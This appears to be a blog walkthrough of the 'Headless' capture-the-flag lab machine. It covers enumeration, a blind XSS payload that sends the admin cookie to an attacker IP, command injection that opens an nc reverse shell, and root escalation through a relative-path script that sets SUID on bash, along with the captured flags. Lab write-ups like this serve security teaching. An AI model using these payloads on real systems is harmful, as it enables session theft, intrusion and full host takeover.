Command Palette

Search for a command to run...

Blog
PreviousNext

Headless - Walkthrough

Headless is an easy-difficulty Linux machine that features a Python Werkzeug server hosting a website. The website has a customer support form, which is found to be vulnerable to blind Cross-Site Scripting (XSS) via the User-Agent header. This vulnerability is leveraged to steal an admin cookie, which is then used to access the administrator dashboard. The page is vulnerable to command injection, leading to a reverse shell on the box. Enumerating the user's mail reveals a script that does not use absolute paths, which is leveraged to get a shell as root.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.8 -oG allPorts

The scan reveals:

PORTSTATESERVICE
22/tcpopenssh
5000/tcpopenupnp

A targeted scan shows:

  • SSH → OpenSSH 9.2p1 Debian
  • HTTP (5000) → Python Werkzeug server

We perform content discovery:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.11.8:5000/FUZZ -t 100 -mc all -fs 207

Discovered endpoints: /dashboard, /support

support form

Foothold

The /support page contains a contact form. Testing for XSS in the User-Agent header reveals the application reflects it in an admin panel. We craft a blind XSS payload to steal the admin cookie:

<script>
  document.location = "http://10.10.14.52/?c=" + document.cookie;
</script>

We capture the admin cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0

We access /dashboard with the stolen cookie and discover a command injection vulnerability in the date parameter:

curl -s -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0" --data-binary "date=2023-09-15;ls" http://10.10.11.8:5000/dashboard

We exploit it to gain a reverse shell:

curl -s -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0" --data-binary "date=2023-09-15;nc+-c+bash+10.10.14.52+5000" http://10.10.11.8:5000/dashboard

Shell obtained as dvir. User flag captured:

cat user.txt

User flag: 29ed468da22ba93b04fa63ac4fbb4493

Privilege Escalation

We check sudo privileges:

sudo -l
User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

The script calls ./initdb.sh with a relative path. We create a malicious initdb.sh:

echo "chmod u+s /bin/bash" > initdb.sh
chmod +x initdb.sh

We execute the syscheck script:

sudo /usr/bin/syscheck
Database service is not running. Starting it...

The SUID bit is set on bash. We escalate to root:

bash -p

Root flag obtained:

cat /root/root.txt

Root flag: 3cc7ca87466e1f3363ff9fe479375b95